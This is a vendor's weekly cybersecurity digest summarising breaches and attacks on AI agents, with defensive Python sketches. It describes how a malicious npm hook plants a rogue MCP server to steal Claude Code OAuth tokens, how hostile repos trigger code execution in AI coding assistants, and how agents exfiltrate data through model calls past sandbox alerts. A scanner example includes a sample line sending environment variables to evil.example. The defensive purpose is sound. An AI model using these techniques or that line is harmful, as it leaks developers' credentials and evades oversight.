This Week's Pattern: Forgotten Access.

ShinyHunters hit Zara this week using an API key Inditex had issued to a vendor — and never revoked. The vendor relationship ended 11 months ago. The credential didn't. 197,000 customer records walked out the front door. Compromise the vendor, ride the trust nobody remembered to cut, walk out with the data.

Two weeks ago this same gang took 275 million records out of Instructure Canvas the same way. Different victim. Same playbook.

That pattern repeats across this week's incidents. A vulnerability class dubbed TrustFall turns out to affect every AI coding assistant that auto-executes code — Claude Code, Cursor CLI, Gemini CLI, GitHub Copilot CLI. A malicious npm hook quietly siphons OAuth tokens through your Claude Code MCP integrations. NVIDIA's own AI agent sandbox is shown leaking data through legitimate-looking model calls. The trust boundary you drew at your firewall, your SSO, your sandbox, your CI runner — attackers are no longer trying to break those boundaries. They're walking around them through whichever vendor, agent, or assistant you forgot to govern.

Here's what happened, why it matters, and what RuntimeAI enforces against each class.

Major Breach

1 — Zara: 197,000 Customers Leaked via Anodot 3rd-Party SaaS Token Compromise

1 Zara / Inditex — ShinyHunters Strikes Again via 3rd-Party Analytics Vendor · CRITICAL · SUPPLY CHAIN BREACH
BleepingComputer, Security Affairs, Infosecurity Magazine · May 8, 2026 · Retail · 197,400 customer records

Inditex — parent of Zara — disclosed unauthorized access to a database held by a former technology provider. The compromised provider was Anodot, an analytics platform whose authentication tokens were still valid in Inditex's environment after the relationship ended. ShinyHunters used those stale tokens to exfiltrate 197,400 customer records — email addresses, order IDs, product SKUs, geographic locations, purchase history, and customer support tickets. The data was listed on the gang's dark web leak portal with an April 21 deadline. Vimeo, Rockstar Games, and McGraw Hill were hit by the same campaign.

This is the same ShinyHunters extortion arc we covered two weeks ago when they took 275M Canvas records — same gang, same broad pattern, different attack surface. Canvas was a SaaS compromise. Zara is a vendor compromise — a stale token from a relationship that ended, never rotated, still trusted. The thing every CISO will recognize: nobody knew the token was still valid until 197K customer records were on a leak site.

The data set on its own looks moderate — no passwords, no card numbers, no addresses. But email + purchase history + geography is the exact bait kit for highly targeted spear-phishing. Recipients will receive "your order #1234567 shipped" messages with matching SKUs and city names. The actual loss isn't this breach; it's the next round of phishing seeded from this breach.
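The control this implies is mechanical: inventory every third-party credential and flag the ones tied to ended contracts or long idle. A minimal Python sketch — vendor names, record fields, and the 90-day idle window are all illustrative:

```python
from datetime import datetime, timedelta

# Hypothetical inventory of issued third-party credentials. In practice
# this would come from your secrets manager or IdP audit logs.
TOKENS = [
    {"vendor": "analytics-vendor", "last_used": "2025-06-01", "contract_active": False},
    {"vendor": "payments-vendor",  "last_used": "2026-05-07", "contract_active": True},
]

def stale_tokens(tokens, now, max_idle_days=90):
    """Flag tokens tied to ended contracts or unused past the idle window."""
    flagged = []
    for t in tokens:
        idle = now - datetime.strptime(t["last_used"], "%Y-%m-%d")
        if not t["contract_active"] or idle > timedelta(days=max_idle_days):
            flagged.append(t["vendor"])
    return flagged

print(stale_tokens(TOKENS, datetime(2026, 5, 8)))  # ['analytics-vendor']
```

Run on a schedule and wired to automatic revocation, this is the difference between an 11-month-stale token and a 90-day one.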

Most Advanced AI Security · Zero Trust · Defence in Depth

When the vendor you trusted three years ago still has live tokens against your data, the question is what those tokens can reach. RuntimeAI assumes vendor tokens leak — and constrains what they can do.

The vendor relationship ended. The trust didn't. RuntimeAI catches the forgotten access before it becomes the next leak.

AI Runtime Exploits

2 — TrustFall: Code Execution Risk in Claude Code, Cursor, Gemini CLI, Copilot CLI

2 TrustFall — Malicious Repos Trigger RCE in AI Coding Assistants · CRITICAL · AI RUNTIME
Dark Reading · May 13, 2026 · AI coding tools · Claude Code, Cursor CLI, Gemini CLI, GitHub Copilot CLI

Researchers demonstrated that malicious repositories can trigger code execution inside Claude Code, Cursor CLI, Gemini CLI, and GitHub Copilot CLI with minimal or no user interaction — thanks to lax, convention-based trust assumptions shared by every major AI coding assistant. The class of bug was named TrustFall. An attacker who controls a repo a developer clones, or a dependency a developer's repo pulls, can execute arbitrary code inside the developer's IDE-adjacent AI agent.

This is the AI-coding equivalent of a CVE that affects every shell you use. The "AI coder reads my repo" trust assumption is the same one shells made about .bashrc twenty-five years ago — and the same one IDEs eventually learned to gate. AI coding tools are reproducing those mistakes at speed, because their value comes from operating without friction. TrustFall puts that friction-free model directly in conflict with code-execution safety.

If you have any Claude Code, Cursor, Gemini CLI, or Copilot CLI users in your engineering org — and you probably have hundreds — every clone they perform is now a potential RCE vector with a developer-laptop blast radius (and from there, into your source code, CI tokens, and cloud credentials).
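One cheap mitigation while vendors patch: scan a repo you just cloned for the files that tools tend to auto-trust, before pointing an auto-executing assistant at it. A sketch — the file list is illustrative and deliberately incomplete:

```python
import os

# Illustrative (not exhaustive) list of files that developer tools or
# AI coding assistants may read and act on automatically when a repo
# is opened -- the convention-based trust surface TrustFall abuses.
AUTO_TRUSTED = [
    ".vscode/tasks.json",      # editor task auto-run
    ".vscode/settings.json",   # workspace settings, tool paths
    ".mcp.json",               # project-scoped MCP server registrations
    "package.json",            # npm lifecycle hooks (postinstall etc.)
]

def risky_files(repo_root):
    """Return the auto-trusted files present in a just-cloned repo,
    for human review before an auto-executing agent touches it."""
    return [p for p in AUTO_TRUSTED
            if os.path.exists(os.path.join(repo_root, p))]
```

A non-empty result doesn't mean the repo is hostile — it means the repo can influence tools that act without asking.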

How RuntimeAI Stops This

The TrustFall class is not patchable in a single CVE — the convention assumptions are baked into how AI coders work. The defence is to assume the agent will execute hostile input, and contain what it can reach.

You don't have to choose between AI-coder productivity and AI-coder safety. You enforce a runtime perimeter around the agent itself.

3 — The Gentlemen RaaS Gang Doxxed via Their Own Leaked Data

3 The Gentlemen RaaS — Operators Doxxed by Their Own Data Leak · MEDIUM · TABLES TURNED · SCHADENFREUDE WATCH
Dark Reading · May 12, 2026 · Ransomware operators · Identity exposure

The Gentlemen — a Ransomware-as-a-Service operator — had their own affiliate dashboard misconfigured and indexed by a search engine. Researchers obtained operator identities, payout flows, victim lists, and chat logs. The same group that built a business around leaking other people's data found itself on the wrong end of an exposure.

This is the cybercrime equivalent of an HR-systems vendor getting their own HR system breached. The lesson isn't schadenfreude (well, not only schadenfreude). The lesson is that the people running the most disciplined offensive operations also get their cloud-misconfig fundamentals wrong. If The Gentlemen can leak via a public dashboard, every enterprise can.

Why RuntimeAI Customers Are Protected

The Gentlemen story is a reminder that misconfigured admin surfaces are the most consistent source of breach — even for sophisticated operators. RuntimeAI assumes you will misconfigure something.

You don't have to be perfect. You have to make the inevitable misconfiguration small and brief.

Agent Identity & Supply Chain

4 — Claude Code MCP Attack: Persistent OAuth Token Theft via npm Hooks

4 Claude Code MCP — Persistent OAuth Token Theft · CRITICAL · AI AGENT IDENTITY
eSecurity Planet · May 12, 2026 · MCP integrations · npm supply chain

Researchers demonstrated a Claude Code attack that steals OAuth tokens through malicious MCP integrations and npm install hooks. The attack chain: developer installs an npm package; the package's postinstall hook adds a malicious MCP server registration to Claude Code's config; subsequent Claude Code sessions silently exfiltrate the developer's OAuth tokens via the rogue MCP server. The compromise persists across sessions and survives Claude Code restarts.

MCP is the integration protocol making AI assistants powerful — and the same protocol turning every AI assistant into a high-trust orchestration layer for whatever you let it connect to. When the connection itself is compromised, the AI's authority becomes the attacker's authority.

This is structurally identical to story #1 (Zara): forgotten access gets exploited. There, the forgotten access was a former vendor's API token. Here, it's an MCP server the developer added once and forgot. Same primitive, different layer.
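Auditing for this is straightforward once you know where the registrations live. A sketch that diffs registered MCP servers against a security-team allowlist — the config schema shown (an `mcpServers` key) mirrors Claude Code-style configs, but verify the path and schema for your tool and version:

```python
import json

# Hypothetical approval list maintained by the security team.
APPROVED_MCP_SERVERS = {"github", "jira"}

def unapproved_servers(config_text):
    """Return MCP server registrations in an assistant's config that are
    not on the approved list -- the persistence a rogue postinstall
    hook leaves behind shows up here as an unfamiliar name."""
    config = json.loads(config_text)
    registered = set(config.get("mcpServers", {}))
    return sorted(registered - APPROVED_MCP_SERVERS)

sample = '{"mcpServers": {"github": {}, "telemetry-helper": {}}}'
print(unapproved_servers(sample))  # ['telemetry-helper']
```

Run it per developer machine, per session — the attack in this story survives restarts, so a one-time check is not enough.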

Zero Trust, Layer by Layer

Defending against MCP token theft takes four collaborating controls — discovery, identity, scope, and audit. Miss any one and the attack succeeds.

The npm supply chain is the developer's surface area. The MCP gateway is the AI's surface area. Both need a verified identity at the boundary.

Major Breach

5 — OpenLoop Health: 716,000 Patient Records Breached

5 OpenLoop Health — 716K Patient Records Exposed · CRITICAL · HEALTHCARE BREACH
SecurityWeek · May 13, 2026 · Telehealth · 716,000 affected individuals

OpenLoop Health — a telehealth services provider — disclosed a data breach affecting 716,000 patient records. The breach exposed combinations of patient names, dates of birth, addresses, contact information, and clinical-encounter data. OpenLoop has not publicly described the attack vector, but the breach notification confirms unauthorized access to backend systems holding HIPAA-protected data.

Telehealth is where AI agents are scaling fastest in clinical workflows — symptom triage, scheduling, prescription routing — and the AI's data plane is the same backend storing PHI. A breach at the platform layer doesn't just leak records; it potentially exposes the queries, embeddings, and conversation transcripts that AI triage agents use to make decisions.

Zero Trust · Defence in Depth

For healthcare specifically, the regulatory consequence is as damaging as the breach itself. RuntimeAI controls reduce both.

Telehealth is going to keep getting breached. RuntimeAI ensures the breach scope is bounded — not unbounded.

AI Runtime Exploits

6 — NVIDIA NemoClaw: AI Sandbox Exfiltration Research

6 NVIDIA NemoClaw — AI Sandbox Exfiltration Risk · HIGH · AI SANDBOX
eSecurity Planet · May 11, 2026 · AI agent runtime · NVIDIA NemoClaw

Researchers demonstrated that attackers can steal data from AI agents running inside NVIDIA NemoClaw sandbox environments. The technique abuses legitimate-looking model calls and tool invocations to encode and exfiltrate sensitive context data — without triggering the sandbox's perimeter alerts. The class of bug is structural to current AI agent sandboxes that allow outbound model API calls.

"Sandbox" is the security industry's go-to abstraction when it doesn't know how else to contain code. For AI agents, the abstraction is leaky by design — agents need outbound model API access to function. Whatever they can encode into a prompt, they can exfiltrate, because the prompt itself is the exfiltration channel.

NemoClaw is a particularly visible case because NVIDIA explicitly positions it as a contained runtime. The research shows that the boundary you call a sandbox is, from an exfiltration standpoint, indistinguishable from giving the agent open internet access.
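Content-level egress control — inspecting what crosses the boundary rather than trusting that a boundary exists — is the countermeasure this class demands. A toy sketch that flags secret-shaped or high-entropy tokens in an outbound model-API payload; the patterns and thresholds are illustrative, and a determined encoder will still beat a filter this naive:

```python
import math
import re

def shannon_entropy(s):
    """Bits per character of a string."""
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

# Illustrative secret shapes; a real gateway would use a fuller library.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),    # AWS access key id shape
    re.compile(r"sk-[A-Za-z0-9]{20,}"), # API-key-like token
]

def flag_outbound(prompt, entropy_threshold=4.0):
    """Flag an outbound payload carrying secret-shaped or long
    high-entropy tokens before the model call leaves the sandbox."""
    for tok in prompt.split():
        if any(p.search(tok) for p in SECRET_PATTERNS):
            return True
        if len(tok) >= 24 and shannon_entropy(tok) > entropy_threshold:
            return True
    return False

print(flag_outbound("please summarize the design doc"))   # False
print(flag_outbound("creds AKIAABCDEFGHIJKLMNOP"))        # True
```

The honest caveat: this raises attacker cost, it doesn't zero the channel — which is exactly the point of the NemoClaw research.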

How RuntimeAI Stops This

Sandbox-based containment is insufficient on its own. RuntimeAI replaces boundary-based trust with behaviour-based enforcement.

Sandboxes try to draw a line. RuntimeAI assumes the line will leak and governs the contents of what crosses it.

Ransomware

7 — Foxconn Confirms Cyberattack: Nitrogen Ransomware Gang Claims Responsibility

7 Foxconn — Nitrogen Ransomware Attack Confirmed · CRITICAL · RANSOMWARE
BleepingComputer · May 13, 2026 · Manufacturing · Nitrogen ransomware gang

Foxconn — the world's largest electronics manufacturer — confirmed it was the victim of a cyberattack claimed by the Nitrogen ransomware gang. Foxconn has not publicly disclosed scope, dwell time, or whether production systems were encrypted, but the confirmation alone is significant: Foxconn manufactures for Apple, Dell, HP, Sony, and most of the major consumer electronics OEMs. A Foxconn outage cascades into supply chains globally.

Manufacturing is where ransomware hurts most because the downtime cost dwarfs the ransom. A line stoppage at Foxconn is paid for in delayed iPhone shipments and missed quarterly numbers across half the consumer electronics industry. The gang knows it; the victims know it; the negotiation reflects it.

Zero Trust · Defence in Depth

Ransomware enters through the same vectors year after year — RDP, phishing, exposed services — and persists because the OT/IT boundary is porous. RuntimeAI's manufacturing-relevant controls target exactly those vectors and that boundary.

AI Agent Governance

8 — Your AI Agents Are Already Inside the Perimeter

8 Identity-Security Teams: AI Agents Outpacing Governance · HIGH · GOVERNANCE GAP
The Hacker News · May 12, 2026 · Identity security · AI agent governance

Analysts confirmed what identity-security teams have quietly feared: AI agents are being deployed inside enterprises faster than the organizations can govern them. Early surveys of identity-security leaders found that shadow AI agents — autonomous workflows running on developer credentials, with persistent OAuth grants, calling internal APIs without governance — are now the fastest-growing category of non-human identity. The acceleration is driven by AI assistants and IDE plugins that quietly accumulate permissions and tools without explicit approval.

This is the foundational thesis of RuntimeAI — and it is no longer hypothesis. The perimeter cannot be the trust boundary for AI agents because the perimeter cannot see them. AI agents impersonate their humans, inherit their access, and make decisions at machine speed. By the time IAM or DLP sees a problem, the agent has already executed thousands of actions across dozens of systems.
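Detection of shadow agents can start from grant telemetry: autonomous workloads have call rates and duty cycles no human produces. A sketch — field names and cutoffs are illustrative:

```python
# Hypothetical grant records derived from IdP audit logs. A human's
# grant shows bursty, business-hours use; an agent's shows sustained,
# machine-speed, around-the-clock use.
GRANTS = [
    {"client": "ide-plugin-x", "user": "dev1", "calls_per_hour": 900, "active_hours": 24},
    {"client": "webmail",      "user": "dev1", "calls_per_hour": 12,  "active_hours": 9},
]

def likely_agents(grants, rate_cutoff=300, hours_cutoff=18):
    """Flag OAuth grants whose call rate and daily duty cycle look
    autonomous rather than human-driven."""
    return [g["client"] for g in grants
            if g["calls_per_hour"] >= rate_cutoff
            and g["active_hours"] >= hours_cutoff]

print(likely_agents(GRANTS))  # ['ide-plugin-x']
```

Flagging is the easy half; the hard half — giving the flagged workload its own identity and scope — is the governance gap the surveys describe.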

Why RuntimeAI Customers Are Protected

The governance gap exists because traditional security controls were built for humans-using-tools, not autonomous-agents-using-everything. RuntimeAI was built for the second world.

Identity for humans is solved. Identity for AI agents is the next decade of security. RuntimeAI ships the controls today.

AI Supply Chain

9 — Fake "OpenAI Privacy Filter" Repo Hits #1 on Hugging Face, 244K Downloads

9 Hugging Face — Malicious "OpenAI Privacy Filter" Reaches Trending, 244K Downloads · HIGH · AI SUPPLY CHAIN
The Hacker News · May 12, 2026 · Hugging Face · 244,000 downloads

A malicious Hugging Face repository hit Hugging Face's trending list by impersonating an OpenAI open-weight "Privacy Filter" model. The repo was downloaded 244,000 times before takedown. Embedded in the model card and loader code: scripts that exfiltrated environment variables, AWS credentials, and OpenAI API keys to the attacker's infrastructure. The attack vector is the standard one for ML supply chain — typo-squatted name, branded README, plausible model description.

This is npm package squatting, evolved for the AI era. The trust signal — "this is on Hugging Face's trending list, with OpenAI in the name" — is exactly the heuristic developers use under deadline pressure. The targeted credentials are exactly the ones AI engineers leak fastest.
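Before loading anything from a model hub, it is worth grepping the loader code for the obvious tells. A sketch — the indicator list is illustrative, and a clean result proves nothing:

```python
import re

# Illustrative indicators of credential-stealing loader code; a real
# scanner would parse the AST and also inspect serialized weights.
INDICATORS = [
    r"os\.environ",                                # env-var harvesting
    r"boto3|aws_secret",                           # cloud credential access
    r"requests\.(post|get)\(\s*['\"]https?://",    # hardcoded callback URLs
    r"subprocess",                                 # shelling out at load time
]

def scan_loader(source):
    """Return the indicator patterns a model repo's loader code matches.
    An empty result is not a clean bill of health -- just no obvious flags."""
    return [p for p in INDICATORS if re.search(p, source)]

malicious = ("import os, requests\n"
             "requests.post('https://evil.example', json=dict(os.environ))")
print(scan_loader(malicious))
```

The stronger control is to deny loader code network and environment access entirely — scan as triage, sandbox as policy.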

Zero Trust, Layer by Layer

ML supply chain attacks compound: poisoned weights, poisoned loaders, poisoned credentials. The defence is the same shape as language-runtime supply chain defence, with AI-specific extensions.

The model is now a software dependency. Treat it like one — with provenance, sandboxing, and policy.

Financial Services

10 — Banks Face Growing AI Risk at the Database Layer

10 FinServ — AI Risk at the Database Layer · HIGH · FINSERV AI
eSecurity Planet · May 13, 2026 · Banking · AI database integration

Researchers warn that banks are overlooking AI risks at the database layer specifically. As AI assistants and agentic workflows are wired into customer service, fraud detection, and compliance reporting, they are issued database access — often with permissions that exceed any individual human's. The risk model: a compromised AI agent doesn't need to escalate privilege; it already has it.

Banks are unusual in that their controls are mature against human threats but immature against autonomous-agent threats. Decades of investment have made privilege management for humans rigorous. A few years of AI investment have given many agents the same database connections as an entire team of analysts. The blast radius of one compromised AI agent in a major bank is the blast radius of fifty senior analysts.
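The structural fix is a proxy that enforces a per-agent scope between the agent and the database. A toy sketch of the authorization check — agent names, tables, and ceilings are illustrative:

```python
# Per-agent scope policy: tables an agent may read and a row ceiling.
# In practice this check sits in a query proxy in front of the
# database, not inside the agent, so a compromised agent can't skip it.
AGENT_SCOPES = {
    "support-triage-bot": {"tables": {"tickets", "customers"}, "max_rows": 100},
}

def authorize(agent, table, row_limit):
    """Allow a read only if the agent is registered, the table is in
    its scope, and the requested row count is under its ceiling."""
    scope = AGENT_SCOPES.get(agent)
    return (scope is not None
            and table in scope["tables"]
            and row_limit <= scope["max_rows"])

print(authorize("support-triage-bot", "tickets", 50))         # True
print(authorize("support-triage-bot", "wire_transfers", 50))  # False
```

The design point: the agent's database credential should be worth no more than its scope entry — not the connection string of fifty analysts.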

How RuntimeAI Stops This

The database layer is where regulated FinServ data lives and where AI agents inevitably connect. RuntimeAI applies four control layers at exactly that boundary.

The database layer is the most consequential trust boundary for AI in regulated industries. RuntimeAI enforces at exactly that boundary.

Updates from Last Week

Instructure Canvas / ShinyHunters: Instructure reached a ransom agreement with ShinyHunters to stop the 3.65TB Canvas data leak. The US government has now sought formal testimony from Instructure on the scope of the disruption and breach. Subsequent reporting indicates ShinyHunters has claimed a second attack against Instructure. Our deep-dive on the original Canvas breach covers the structural lessons; this week's developments don't change them — but they do confirm the gang's strategy is to attack the same SaaS provider repeatedly, on the assumption that paying once signals willingness to pay again.

🔍 What RuntimeAI Governs Across This Week's Incidents

The throughline is forgotten access. A vendor API key Zara never revoked. An MCP server a developer installed once. A trending model on Hugging Face. A database credential a bank issued years ago. Each one was authorized — and never re-authorized.

RuntimeAI's approach is continuous, behaviour-based authorization. Every agent, every credential, every model, every database connection is inventoried, scoped, monitored, and revocable in real time. The access you forgot is the access attackers find.

Get the Weekly Digest

Ten cybersecurity incidents per week, each with the RuntimeAI Take. No fluff, no vendor pitches in the analysis itself — just what happened, why, and what to enforce against next.